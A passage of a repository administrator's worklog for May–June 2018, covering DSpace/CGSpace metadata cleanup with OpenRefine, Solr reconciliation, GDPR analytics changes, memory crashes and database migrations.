  • On the messed up IITA records from 2018-04 I see sixty DOIs in incorrect format (cg.identifier.doi)
  • +
+

2018-05-06

+
    +
  • Fixing the IITA records from Sisay, sixty DOIs have completely invalid format like http:dx.doi.org10.1016j.cropro.2008.07.003
  • +
  • I corrected all the DOIs and then checked them for validity with a quick bash loop:
  • +
+
$ for line in $(< /tmp/links.txt); do echo $line; http --print h $line; done
+
    +
  • Most of the links are good, though one is a duplicate and one even seems to be incorrect on the publisher’s site, so…
  • +
  • Also, there are some duplicates: +
      +
    • 10568/92241 and 10568/92230 (same DOI)
    • +
    • 10568/92151 and 10568/92150 (same ISBN)
    • +
    • 10568/92291 and 10568/92286 (same citation, title, authors, year)
    • +
    +
  • +
  • Messed up abstracts: +
      +
    • 10568/92309
    • +
    +
  • +
  • Fixed some issues in regions, countries, sponsors, ISSN, and cleaned whitespace errors from citation, abstract, author, and titles
  • +
  • Fixed all issues with CRPs
  • +
  • A few more interesting Unicode characters to look for in text fields like author, abstracts, and citations might be: (0x2019), · (0x00b7), and (0x20ac)
  • +
  • A custom text facet in OpenRefine with this GREL expression could be good for finding invalid characters or encoding errors in authors, abstracts, etc:
  • +
+
or(
+  isNotNull(value.match(/.*[(|)].*/)),
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b7.*/)),
+  isNotNull(value.match(/.*\u20ac.*/))
+)
+
    +
  • I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!
  • +
  • Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the resolve-orcids.py script:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-05-06-combined.txt
+$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I made a pull request (#373) for this that I’ll merge some time next week (I’m expecting Atmire to get back to us about DSpace 5.8 soon)
  • +
  • After testing quickly I just decided to merge it, and I noticed that I don’t even need to restart Tomcat for the changes to get loaded
  • +
+

2018-05-07

+
    +
  • I spent a bit of time playing with conciliator and Solr, trying to figure out how to reconcile columns in OpenRefine with data in our existing Solr cores (like CRP subjects)
  • +
  • The documentation regarding the Solr stuff is limited, and I cannot figure out what all the fields in conciliator.properties are supposed to be
  • +
  • But then I found reconcile-csv, which allows you to reconcile against values in a CSV file!
  • +
  • That, combined with splitting our multi-value fields on “||” in OpenRefine is amaaaaazing, because after reconciliation you can just join them again
  • +
  • Oh wow, you can also facet on the individual values once you’ve split them! That’s going to be amazing for proofing CRPs, subjects, etc.
  • +
+

2018-05-09

+
    +
  • Udana asked about the Book Chapters we had been proofing on DSpace Test in 2018-04
  • +
  • I told him that there were still some TODO items for him on that data, for example to update the dc.language.iso field for the Spanish items
  • +
  • I was trying to remember how I parsed the input-forms.xml using xmllint to extract subjects neatly
  • +
  • I could use it with reconcile-csv or to populate a Solr instance for reconciliation
  • +
  • This XPath expression gets close, but outputs all items on one line:
  • +
+
$ xmllint --xpath '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/node()' dspace/config/input-forms.xml        
+Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
+
    +
  • Maybe xmlstarlet is better:
  • +
+
$ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/text()' dspace/config/input-forms.xml
+Agriculture for Nutrition and Health
+Big Data
+Climate Change, Agriculture and Food Security
+Excellence in Breeding
+Fish
+Forests, Trees and Agroforestry
+Genebanks
+Grain Legumes and Dryland Cereals
+Livestock
+Maize
+Policies, Institutions and Markets
+Rice
+Roots, Tubers and Bananas
+Water, Land and Ecosystems
+Wheat
+Aquatic Agricultural Systems
+Dryland Cereals
+Dryland Systems
+Grain Legumes
+Integrated Systems for the Humid Tropics
+Livestock and Fish
+
    +
  • Discuss Colombian BNARS harvesting the CIAT data from CGSpace
  • +
  • They are using a system called Primo and the only options for data harvesting in that system are via FTP and OAI
  • +
  • I told them to get all CIAT records via OAI
  • +
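  • For reference, a ListRecords request for one community looks something like this (the set spec here is a placeholder; DSpace builds them from the handle, ie com_10568_NNNN or col_10568_NNNN):
+
$ http 'https://cgspace.cgiar.org/oai/request?verb=ListRecords&metadataPrefix=oai_dc&set=com_10568_NNNN'
+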
  • Just a note to myself, I figured out how to get reconcile-csv to run from source rather than running the old pre-compiled JAR file:
  • +
+
$ lein run /tmp/crps.csv name id
+
    +
  • I tried to reconcile against a CSV of our countries but reconcile-csv crashes
  • +
+

2018-05-13

+
    +
  • It turns out there was a space in my “country” header that was causing reconcile-csv to crash
  • +
  • After removing that it works fine!
  • +
  • Looking at Sisay’s 2,640 CIFOR records on DSpace Test (10568/92904) +
      +
    • Trimmed all leading / trailing white space and condensed multiple spaces into one
    • +
    • Corrected DOIs to use HTTPS and “doi.org” instead of “dx.doi.org” +
        +
      • There are eight items in cg.identifier.doi that are not DOIs
      • +
      +
    • +
    • Corrected cg.identifier.url links to cifor.org to use HTTPS
    • +
    • Corrected dc.language.iso from vt to vi (Vietnamese)
    • +
    • Corrected affiliations to not use acronyms
    • +
    • Reconcile countries against our countries list (removing terms like LATIN AMERICA, CENTRAL AFRICA, etc that are not countries)
    • +
    • Reconcile regions against our list of regions
    • +
    +
  • +
+

2018-05-14

+
    +
  • Send a message to the OpenRefine mailing list about the bug with reconciling multi-value cells
  • +
  • Help Silvia Alonso get a list of all her publications since 2013 from Listings and Reports
  • +
+

2018-05-15

+
    +
  • Turns out I was doing the OpenRefine reconciliation wrong: I needed to copy the matched values to a new column!
  • +
  • Also, I learned how to do something cool with Jython expressions in OpenRefine
  • +
  • This will fetch a URL and return its HTTP response code:
  • +
+
import urllib2
+import re
+
+pattern = re.compile('.*10.1016.*')
+if pattern.match(value):
+  get = urllib2.urlopen(value)
+  return get.getcode()
+
+return "blank"
+
    +
  • I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs
  • +
  • Here the response code would be 200, 404, etc, or “blank” if there is no URL for that item
  • +
  • You could use this in a facet or in a new column
  • +
  • More information and good examples here: https://programminghistorian.org/lessons/fetch-and-parse-data-with-openrefine
  • +
  • Finish looking at the 2,640 CIFOR records on DSpace Test (10568/92904), cleaning up authors and adding collection mappings
  • +
  • They can now be moved to CGSpace as far as I’m concerned, but I don’t know if Sisay will do it or me
  • +
  • I was checking the CIFOR data for duplicates using Atmire’s Metadata Quality Module (and found some duplicates actually), but then DSpace died…
  • +
  • I didn’t see anything in the Tomcat, DSpace, or Solr logs, but I saw this in dmesg -T:
  • +
+
[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
+[Tue May 15 12:10:01 2018] Killed process 3763 (java) total-vm:14667688kB, anon-rss:5705268kB, file-rss:0kB, shmem-rss:0kB
+[Tue May 15 12:10:01 2018] oom_reaper: reaped process 3763 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • So the Linux kernel killed Java…
  • +
  • Maria from Bioversity mailed to say she got an error while submitting an item on CGSpace:
  • +
+
Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
+
    +
  • Looking in the DSpace log I see something related:
  • +
+
2018-05-15 12:35:30,858 INFO  org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
+
    +
  • So I’m not sure…
  • +
  • I finally figured out how to get OpenRefine to reconcile values from Solr via conciliator:
  • +
  • The trick was to use a more appropriate Solr fieldType text_en instead of text_general so that more terms match, for example uppercase and lower case:
  • +
+
$ ./bin/solr start
+$ ./bin/solr create_core -c countries
+$ curl -X POST -H 'Content-type:application/json' --data-binary '{"add-field": {"name":"country", "type":"text_en", "multiValued":false, "stored":true}}' http://localhost:8983/solr/countries/schema
+$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
+
    +
  • It still doesn’t catch simple mistakes like “ALBANI” or “AL BANIA” for “ALBANIA”, and it doesn’t return scores, so I have to select matches manually:
  • +
+

OpenRefine reconciling countries from local Solr

+
    +
  • I should probably make a general copy field and set it to be the default search field, like DSpace’s search core does (see schema.xml):
  • +
+
<defaultSearchField>search_text</defaultSearchField>
+...
+<copyField source="*" dest="search_text"/>
+
    +
  • Actually, I wonder how much of their schema I could just copy…
  • +
  • Apparently the default search field is the df parameter and you could technically just add it to the query string, so no need to bother with that in the schema now
  • +
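  • For example, something like this against the local countries core (sketch):
+
$ curl 'http://localhost:8983/solr/countries/select?q=ALBANIA&df=country'
+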
  • I copied over the DSpace search_text field type from the DSpace Solr config (had to remove some properties so Solr would start) but it doesn’t seem to be any better at matching than the text_en type
  • +
  • I think I need to focus on trying to return scores with conciliator
  • +
+

2018-05-16

+
    +
  • Discuss GDPR with James Stapleton +
      +
    • As far as I see it, we are “Data Controllers” on CGSpace because we store peoples’ names, emails, and phone numbers if they register
    • +
    • We set cookies on the user’s computer, but these do not contain personally identifiable information (PII) and they are “session” cookies which are deleted when the user closes their browser
    • +
    • We use Google Analytics to track website usage, which makes Google the “Data Processor” and in this case we merely need to limit or obfuscate the information we send to them
    • +
    • As the only personally identifiable information we send is the user’s IP address, I think we only need to enable IP Address Anonymization in our analytics.js code snippets
    • +
    • Then we can add a “Privacy” page to CGSpace that makes all of this clear
    • +
    +
  • +
  • Silvia asked if I could sort the records in her Listings and Report output and it turns out that the options are misconfigured in dspace/config/modules/atmire-listings-and-reports.cfg
  • +
  • I created and merged a pull request to fix the sorting issue in Listings and Reports (#374)
  • +
  • Regarding the IP Address Anonymization for GDPR, I amended the Google Analytics snippet in page-structure-alterations.xsl to:
  • +
+
ga('send', 'pageview', {
+  'anonymizeIp': true
+});
+
    +
  • I tested loading a certain page before and after adding this and afterwards I saw that the parameter aip=1 was being sent with the analytics response to Google
  • +
  • According to the analytics.js protocol parameter documentation this means that IPs are being anonymized
  • +
  • After finding and fixing some duplicates in IITA’s IITA_April_27 test collection on DSpace Test (10568/92703) I told Sisay that he can move them to IITA’s Journal Articles collection on CGSpace
  • +
+

2018-05-17

+
    +
  • Testing reconciliation of countries against Solr via conciliator, I notice that CÔTE D'IVOIRE doesn’t match COTE D'IVOIRE, whereas with reconcile-csv it does
  • +
  • Also, when reconciling regions against Solr via conciliator EASTERN AFRICA doesn’t match EAST AFRICA, whereas with reconcile-csv it does
  • +
  • And SOUTH AMERICA matches both SOUTH ASIA and SOUTH AMERICA with the same match score of 2… WTF.
  • +
  • It could be that I just need to tune the query filter in Solr (currently using the example text_en field type)
  • +
  • Oh sweet, it turns out that the issue with searching for characters with accents is called “code folding” in Solr
  • +
  • You can use either a solr.ASCIIFoldingFilterFactory filter or a solr.MappingCharFilterFactory charFilter mapping against mapping-FoldToASCII.txt
  • +
  • Also see: https://opensourceconnections.com/blog/2017/02/20/solr-utf8/
  • +
  • Now CÔTE D'IVOIRE matches COTE D'IVOIRE!
  • +
  • I’m not sure which method is better, perhaps the solr.ASCIIFoldingFilterFactory filter because it doesn’t require copying the mapping-FoldToASCII.txt file
  • +
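  • A minimal sketch of adding such a field type via the Schema API (the field type name is made up, and this is the filter variant rather than the charFilter one):
+
$ curl -X POST -H 'Content-type:application/json' --data-binary '{
  "add-field-type": {
    "name": "text_en_folded",
    "class": "solr.TextField",
    "analyzer": {
      "tokenizer": {"class": "solr.StandardTokenizerFactory"},
      "filters": [
        {"class": "solr.LowerCaseFilterFactory"},
        {"class": "solr.ASCIIFoldingFilterFactory"}
      ]
    }
  }
}' http://localhost:8983/solr/countries/schema
+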
  • And actually I’m not entirely sure about the order of filtering before tokenizing, etc…
  • +
  • Ah, I see that charFilter must be before the tokenizer because it works on a stream, whereas filter operates on tokenized input so it must come after the tokenizer
  • +
  • Regarding the use of the charFilter vs the filter class before and after the tokenizer, respectively, I think it’s better to use the charFilter to normalize the input stream before tokenizing it as I have no idea what kinda stuff might get removed by the tokenizer
  • +
  • Skype with Geoffrey from IITA in Nairobi, who wants to deposit records to CGSpace via the REST API; I told him that this skips the submission workflows, and because we cannot guarantee the data quality we would not allow anyone to use it this way
  • +
  • I finished making the XMLUI changes for anonymization of IP addresses in Google Analytics and merged the changes to the 5_x-prod branch (#375)
  • +
  • Also, I think we might be able to implement opt-out functionality for Google Analytics using a window property that could be managed by storing its status in a cookie
  • +
  • This cookie could be set by a user clicking a link in a privacy policy, for example
  • +
  • The additional Javascript could be easily added to our existing googleAnalytics template in each XMLUI theme
  • +
+

2018-05-18

+ +

2018-05-20

+
    +
  • Run all system updates on DSpace Test (linode19), re-deploy DSpace with latest 5_x-dev branch (including GDPR IP anonymization), and reboot the server
  • +
  • Run all system updates on CGSpace (linode18), re-deploy DSpace with latest 5_x-dev branch (including GDPR IP anonymization), and reboot the server
  • +
+

2018-05-21

+
    +
  • Geoffrey from IITA got back with more questions about depositing items programmatically into the CGSpace workflow
  • +
  • I pointed out that SWORD might be an option, as DSpace supports the SWORDv2 protocol (although we have never tested it)
  • +
  • Work on implementing cookie consent popup for all XMLUI themes (SASS theme with primary / secondary branding from Bootstrap)
  • +
+

2018-05-22

+
    +
  • Skype with James Stapleton about last minute GDPR wording
  • +
  • After spending yesterday working on integration and theming of the cookieconsent popup, today I cannot get the damn “Agree” button to dismiss the popup!
  • +
  • I tried calling it several ways, via jQuery, via a function in page-structure-alterations.xsl, via script tags in <head> in page-structure.xsl, and a few others
  • +
  • The only way it actually works is if I paste it into the community or collection HTML
  • +
  • Oh, actually in testing it appears this is not true
  • +
  • This is a waste of TWO full days of work
  • +
  • Marissa Van Epp asked if I could add PII-FP1_PACCA2 to the CCAFS phase II project tags on CGSpace so I created a ticket to track it (#376)
  • +
+

2018-05-23

+
    +
  • I’m investigating how many non-CGIAR users we have registered on CGSpace:
  • +
+
dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
+
    +
  • We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers
  • +
  • I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with “allow” or “dismiss”
  • +
  • I wrote a quick conditional to check if the user has agreed or not before enabling Google Analytics
  • +
  • I made a pull request for the GDPR compliance popup (#377) and merged it to the 5_x-prod branch
  • +
  • I will deploy it to CGSpace tonight
  • +
+

2018-05-28

+
    +
  • Daniel Haile-Michael sent a message that CGSpace was down (I am currently in Oregon so the time difference is ~10 hours)
  • +
  • I looked in the logs but didn’t see anything that would be the cause of the crash
  • +
  • Atmire finalized the DSpace 5.8 testing and sent a pull request: https://github.com/ilri/DSpace/pull/378
  • +
  • They have asked if I can test this and get back to them by June 11th
  • +
+

2018-05-30

+
    +
  • Talk to Samantha from Bioversity about something related to Google Analytics, I’m still not sure what they want
  • +
  • DSpace Test crashed last night, seems to be related to system memory (not JVM heap)
  • +
  • I see this in dmesg:
  • +
+
[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
+[Wed May 30 00:00:39 2018] Killed process 6082 (java) total-vm:14876264kB, anon-rss:5683372kB, file-rss:0kB, shmem-rss:0kB
+[Wed May 30 00:00:40 2018] oom_reaper: reaped process 6082 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • I need to check the Tomcat JVM heap size/usage, command line JVM heap size (for cron jobs), and PostgreSQL memory usage
  • +
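  • A quick way to see what is eating the memory right now (sketch):
+
$ free -m
$ ps -eo pid,rss,args --sort=-rss | head -n 5
+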
  • It might be possible to adjust some things, but eventually we’ll need a larger VPS instance
  • +
  • For some reason there are no JVM stats in Munin, ugh
  • +
  • Run all system updates on DSpace Test and reboot it
  • +
  • I generated a list of CIFOR duplicates from the CIFOR_May_9 collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika
  • +
  • I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each “Item1” line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):
  • +
+
$ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html > ~/cifor-duplicates.txt
+$ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cleaned.txt
+
    +
  • I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR’s collection
  • +
  • A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections
  • +
  • I can use the /communities/{id}/collections endpoint of the REST API but it only takes IDs (not handles) and doesn’t seem to descend into sub communities
  • +
  • Shit, so I need the IDs for the top-level ILRI community and all its sub-communities (and their sub-communities)
  • +
  • There has got to be a better way to do this than going to each community and getting their handles and IDs manually
  • +
  • Oh shit, I literally already wrote a script to get all collections in a community hierarchy from the REST API: rest-find-collections.py
  • +
  • The output isn’t great, but all the handles and IDs are printed in debug mode:
  • +
+
$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2> /tmp/ilri-collections.txt
+
    +
  • Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
+

2018-05-31

+
    +
  • Clarify CGSpace’s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance
  • +
  • Testing running PostgreSQL in a Docker container on localhost because when I’m on Arch Linux there isn’t an easily installable package for particular PostgreSQL versions
  • +
  • Now I can just use Docker:
  • +
+
$ docker pull postgres:9.5-alpine
+$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest
+
diff --git a/docs/2018-06/index.html b/docs/2018-06/index.html new file mode 100644 index 000000000..0c12c836b --- /dev/null +++ b/docs/2018-06/index.html @@ -0,0 +1,571 @@

June, 2018

+ +
+

2018-06-04

+
    +
  • Test the DSpace 5.8 module upgrades from Atmire (#378) +
      +
    • There seems to be a problem with the CUA and L&R versions in pom.xml because they are using SNAPSHOT and it doesn’t build
    • +
    +
  • +
  • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
  • +
  • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
+
    +
  • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
  • +
  • Time to index ~70,000 items on CGSpace:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+

2018-06-06

+
    +
  • It turns out that I needed to add a server block for atmire.com-snapshots to my Maven settings, so now the Atmire code builds
  • +
  • Now Maven and Ant run properly, but I’m getting SQL migration errors in dspace.log after starting Tomcat
  • +
  • I’ve updated my ticket on Atmire’s bug tracker: https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560
  • +
+

2018-06-07

+
    +
  • Proofing 200 IITA records on DSpace Test for Sisay: IITA_Junel_06 (10568/95391) +
      +
    • Misspelled authorship type: CGAIR single center should be: CGIAR single centre
    • +
    • I see some encoding errors in author affiliations, for example: +
        +
      • Universidade de SÆo Paulo
      • +
      • Institut National des Recherches Agricoles du B nin
      • +
      • Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement
      • +
      • Institut des Recherches Agricoles du B nin
      • +
      • Institut des Savannes, C te d’ Ivoire
      • +
      • Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany
      • +
      • Projet de Gestion des Ressources Naturelles, B nin
      • +
      • Universit t Hannover
      • +
      • Universit F lix Houphouet-Boigny
      • +
      +
    • +
    +
  • +
  • I uploaded fixes for all those now, but I will continue with the rest of the data later
  • +
  • Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:
  • +
+
delete from schema_version where version = '5.6.2015.12.03.2';
+update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
+update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
+
    +
  • And then I need to run the ignored migrations:
  • +
+
$ ~/dspace/bin/dspace database migrate ignored
+
    +
  • Now DSpace starts up properly!
  • +
  • Gabriela from CIP got back to me about the author names we were correcting on CGSpace
  • +
  • I did a quick sanity check on them and then did a test import with my fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
+
    +
  • I will apply them on CGSpace tomorrow I think…
  • +
+

2018-06-09

+
    +
  • It’s pretty annoying, but the JVM monitoring for Munin was never set up when I migrated DSpace Test to its new server a few months ago
  • +
  • I ran the tomcat and munin-node tags in Ansible again and now the stuff is all wired up and recording stats properly
  • +
  • I applied the CIP author corrections on CGSpace and DSpace Test and re-ran the Discovery indexing
  • +
+

2018-06-10

+
    +
  • I spent some time removing the Atmire Metadata Quality Module (MQM) from the proposed DSpace 5.8 changes
  • +
  • After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:
  • +
+
 INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
+Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
+
    +
  • I can fix this by commenting out the ItemCollectionPlugin line of discovery.xml, but from looking at the git log I’m not actually sure if that is related to MQM or not
  • +
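  • To find the offending bean quickly before commenting it out (sketch; the path is the one from the error above):
+
$ grep -n 'ItemCollectionPlugin' ~/dspace/config/spring/api/discovery.xml
+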
  • I will have to ask Atmire
  • +
  • I continued to look at Sisay’s IITA records from last week +
      +
    • I normalized all DOIs to use HTTPS and “doi.org” instead of “dx.doi.org”
    • +
    • I cleaned up white space in cg.subject.iita and dc.subject
    • +
    • Even a bunch of IITA and AGROVOC subjects are missing accents, ie “FERTILIT DU SOL”
    • +
    • More organization names in dc.description.sponsorship are incorrect (ie, missing accents) or inconsistent (ie, CGIAR centers should be spelled in English or multiple spellings of the same one, like “Rockefeller Foundation” and “Rockefeller foundation”)
    • +
    • A few dozen items have abstracts with character encoding errors, ie: +
        +
      • 33.7øC
      • +
      • MgSO4ú7H2O
      • +
      • ha??1&/sup;
      • +
      • En gen6ral
      • +
      • dÕpassÕ
      • +
      +
    • +
    • Also the abstracts have missing accents, ie “recherche sur le d veloppement”
    • +
    +
  • +
  • I will have to tell IITA people to redo these entirely I think…
  • +
+

2018-06-11

+
    +
  • Sisay sent a new version of the last IITA records that he created from the original CSV from IITA
  • +
  • The 200 records are in the IITA_Junel_11 (10568/95870) collection
  • +
  • Many errors: +
      +
    • Authorship types: “CGIAR ans advanced research institute”, “CGAIR and advanced research institute”, “CGIAR and advanced research institutes”, “CGAIR single center”
    • +
    • Lots of inconsistencies and misspellings in author affiliations: +
        +
      • “Institut des Recherches Agricoles du Bénin” and “Institut National des Recherche Agricoles du Benin” and “National Agricultural Research Institute, Benin”
      • +
      • International Insitute of Tropical Agriculture
      • +
      • Centro Internacional de Agricultura Tropical
      • +
      • “Rivers State University of Science and Technology” and “Rivers State University”
      • +
      • “Institut de la Recherche Agronomique, Cameroon” and “Institut de Recherche Agronomique, Cameroon”
      • +
      +
    • +
    • Inconsistency in countries: “COTE D’IVOIRE” and “COTE D’IVOIRE”
    • +
    • A few DOIs with spaces or invalid characters
    • +
    • Inconsistency in IITA subjects, for example “PRODUCTION VEGETALE” and “PRODUCTION VÉGÉTALE” and several others
    • +
    • I ran value.unescape('javascript') on the abstract and citation fields because it looks like this data came from a SQL database and some stuff was escaped
    • +
    +
  • +
  • It turns out that Abenet actually did a lot of small corrections on this data so when Sisay uses Bosede’s original file it doesn’t have all those corrections
  • +
  • So I told Sisay to re-create the collection using Abenet’s XLS from last week (Mercy1805_AY.xls)
  • +
  • I was curious to see if I could create a GREL for use with a custom text facet in Open Refine to find cells with two or more consecutive spaces
  • +
  • I always use the built-in trim and collapse transformations anyways, but this seems to work to find the offending cells: isNotNull(value.match(/.*?\s{2,}.*?/))
  • +
  • I wonder if I should start checking for “smart” quotes like ’ (hex 2019)
  • +
+

2018-06-12

+
    +
  • Udana from IWMI asked about the OAI base URL for their community on CGSpace + +
  • +
  • Regarding Udana’s Book Chapters and Reports on DSpace Test last week, Abenet told him to fix some character encoding and CRP issues, then I told him I’d check them after that
  • +
  • The latest batch of IITA’s 200 records (based on Abenet’s version Mercy1805_AY.xls) are now in the IITA_Jan_9_II_Ab collection
  • +
  • So here are some corrections: +
      +
    • use of Unicode smart quote (hex 2019) in countries and affiliations, for example “COTE D’IVOIRE” and “Institut d’Economic Rurale, Mali”
    • +
    • inconsistencies in cg.contributor.affiliation: +
        +
      • “Centro Internacional de Agricultura Tropical” and “Centro International de Agricultura Tropical” should use the English name of CIAT (International Center for Tropical Agriculture)
      • +
      • “Institut International d’Agriculture Tropicale” should use the English name of IITA (International Institute of Tropical Agriculture)
      • +
      • “East and Southern Africa Regional Center” and “Eastern and Southern Africa Regional Centre”
      • +
      • “Institut de la Recherche Agronomique, Cameroon” and “Institut de Recherche Agronomique, Cameroon”
      • +
      • “Institut des Recherches Agricoles du Bénin” and “Institut National des Recherche Agricoles du Benin” and “National Agricultural Research Institute, Benin”
      • +
      • “Institute of Agronomic Research, Cameroon” and “Institute of Agronomy Research, Cameroon”
      • +
      • “Rivers State University” and “Rivers State University of Science and Technology”
      • +
      • “Universität Hannover” and “University of Hannover”
      • +
      +
    • +
    • inconsistencies in cg.subject.iita: +
        +
      • “AMELIORATION DES PLANTES” and “AMÉLIORATION DES PLANTES”
      • +
      • “PRODUCTION VEGETALE” and “PRODUCTION VÉGÉTALE”
      • +
      • “CONTRÔLE DE MALADIES” and “CONTROLE DES MALADIES”
      • +
      • “HANDLING, TRANSPORT, STORAGE AND PROTECTION OF AGRICULTURAL PRODUCT” and “HANDLING, TRANSPORT, STORAGE AND PROTECTION OF AGRICULTURAL PRODUCTS”
      • +
      • “RAVAGEURS DE PLANTES” and “RAVAGEURS DES PLANTES”
      • +
      • “SANTE DES PLANTES” and “SANTÉ DES PLANTES”
      • +
      • “SOCIOECONOMIE” and “SOCIOECONOMY”
      • +
      +
    • +
    • inconsistencies in dc.description.sponsorship: +
        +
      • “Belgian Corporation” and “Belgium Corporation”
      • +
      +
    • +
    • inconsistencies in dc.subject: +
        +
      • “AFRICAN CASSAVA MOSAIC” and “AFRICAN CASSAVA MOSAIC DISEASE”
      • +
      • “ASPERGILLU FLAVUS” and “ASPERGILLUS FLAVUS”
      • +
      • “BIOTECHNOLOGIES” and “BIOTECHNOLOGY”
      • +
      • “CASSAVA MOSAIC DISEASE” and “CASSAVA MOSAIC DISEASES” and “CASSAVA MOSAIC VIRUS”
      • +
      • “CASSAVA PROCESSING” and “CASSAVA PROCESSING TECHNOLOGY”
      • +
      • “CROPPING SYSTEM” and “CROPPING SYSTEMS”
      • +
      • “DRY SEASON” and “DRY-SEASON”
      • +
      • “FERTILIZER” and “FERTILIZERS”
      • +
      • “LEGUME” and “LEGUMES”
      • +
      • “LEGUMINOSAE” and “LEGUMINOUS”
      • +
      • “LEGUMINOUS COVER CROP” and “LEGUMINOUS COVER CROPS”
      • +
      • “MATÉRIEL DE PLANTATION” and “MATÉRIELS DE PLANTATION”
      • +
      +
    • +
    • I noticed that some records do have encoding errors in the dc.description.abstract field, but only four of them so probably not from Abenet’s handling of the XLS file
    • +
    • Based on manually eyeballing the text I used a custom text facet with this GREL to identify the records:
    • +
    +
  • +
+
or(
